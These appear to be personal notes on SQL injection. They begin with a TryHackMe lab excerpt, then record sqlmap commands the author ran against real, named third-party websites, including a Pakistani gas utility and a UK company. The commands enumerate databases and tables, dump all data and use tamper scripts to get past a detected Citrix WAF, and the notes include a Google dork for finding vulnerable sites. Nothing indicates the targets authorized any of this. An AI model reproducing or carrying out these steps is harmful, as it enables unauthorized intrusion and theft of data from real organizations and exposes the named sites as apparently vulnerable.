SQL Attack

https://tryhackme.com/room/sqlinjectionlm

The key to discovering error-based SQL Injection is to break the code's SQL query by trying
certain characters until an error message is produced; these are most commonly single
apostrophes ( ' ) or a quotation mark ( " ).

Try typing an apostrophe ( ' ) after the id=1 and press enter. And you'll see this returns an
SQL error informing you of an error in your syntax. The fact that you've received this error
message confirms the existence of an SQL Injection vulnerability. We can now exploit this
vulnerability and use the error messages to learn more about the database structure. 

SQL MAP
https://www.youtube.com/watch?v=QsMkQMKsIII

Note: After https://www.sngpl.com.pk/ ,try on http://berkeleyrecycling.org

To find vulnerable site, write dork: inurl:php?id=1

1) To automate (so it won’t ask for yes/no) use -> --batch

2) To specify technique:

Sqlmap –u http://www.abc.com –crawl 3 –technique=”U” (U means union and crawl 3 means crawl
to the 3rd depth)

3) For threads:

4) When the tool can’t find vulnerabilities, it can look for risk by trying the payloads. We can
give value 1, 2,3. It’ll check more severe Payloads by increasing the number from 1-3.

5) When the tool can’t find vulnerabilities, we can increase levels to search for vulnerabilities
for eg going to level ‘2’ it’ll check in the cookie for vulnerabilities and for level ‘3’ it’ll go in to
‘user- agent’ to check. Means we are increasing the range of our testing. We can assign
values from 1-5.
One thing to notice is that by increasing the ‘level’ and ‘risk’ the chances of false positives
can increase.
 After the
scan is completed, we can copy the vulnerable URL so to exploit it.

6) Verbosity gives us the details while looking for vulnerabilities.

2- it shows the debugging messages on the screen

3- it shows the payload it is trying
4- shows the http request (in which form it is going)
5- response headers
6- response page’s contents
By default 1 is selected.

To see http
headers.

7) If we have found vulnerable URL, how to exploit it or get more details out of it.
I found the vulnerable URL of
https://www.sngpl.com.pk/
By writing command
sqlmap -u https://www.sngpl.com.pk/ --crawl 2 --batch --threads 5 --risk 2 --level 1

For current user

For DB and hostname

The results I got from the txt file~:

web application technology: JSP
back-end DBMS: Oracle
 Payload: pgids=3605' AND 6330=6330 AND
'yeqQ'='yeqQ&pgname=PAGES_NAME_a&secs=ss7xa852op845&cats=ct456712337&artcl=a
rtuyh709123465
WAF/IPS identified as 'NetScaler AppFirewall (Citrix)

8) For database details:

sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 -D Oracle --tables --threads 5

Results:

No tables found in the Oracle database FOR sngpl

Those I tried along with the others:

https://www.mohtasibsindh.gov.pk/index.php?id=1

https://www.minddesign.co.uk/show.php?id=174

http://esjindex.org/search.php?id=1

http://www.gdilabs.com/

9)

Things I tried to bypass WAF for sngpl website:

sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --

tamper="between,randomcase,space2comment" -D Oracle –tables

Another command:

sqlmap -u https://www.sngpl.com.pk/page.jsp?pgids=3605 --random-agent -v 3 --

tamper="between,randomcase,space2comment" --dbms "Oracle" Oracle –schema

https://www.websec.ca/publication/Blog/Bypassing_WAFs_with_SQLMap

https://hacknopedia.com/2022/07/29/sqlmap-tamper-script-collection/

https://securityonline.info/sqlmap-tamper-script-bypassing-waf/
In temper option:
apostrophemask.py,apostrophenullencode.py,appendnullbyte.py,base64encode.py,between.py,blu
ecoat.py,chardoubleencode.py,charencode.py,charunicodeencode.py,concat2concatws.py,equaltoli
ke.py,greatest.py,halfversionedmorekeywords.py,ifnull2ifisnull.py,lowercase.py,modsecurityversion
ed.py,modsecurityzeroversioned.py,multiplespaces.py,nonrecursivereplacement.py,overlongutf8.py,
percentage.py,randomcase.py,randomcomments.py,securesphere.py,sp_password.py,space2comm
ent.py,space2dash.py,space2hash.py,space2morehash.py,space2mssqlblank.py,space2mssqlhash.py
,space2mysqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.p
y,unmagicquotes.py,varnish.py,versionedkeywords.py,versionedmorekeywords.py

10) Working on
https://www.minddesign.co.uk/show.php?id=174
sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --current-user --current-db --
hostname –batch

11) For database details

sqlmap -u https://www.minddesign.co.uk/show.php?id=174 --dbs

database has some default files in “information_schema”

12) To see tables

sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --tables

13) To see all data of any table

sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T
modern_cat –dump
14)

To see columns and their data types

sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata -T modern_cat –

columns

14) To dump all data

sqlmap -u https://www.minddesign.co.uk/show.php?id=174 -D jacobs_mddata --dump-all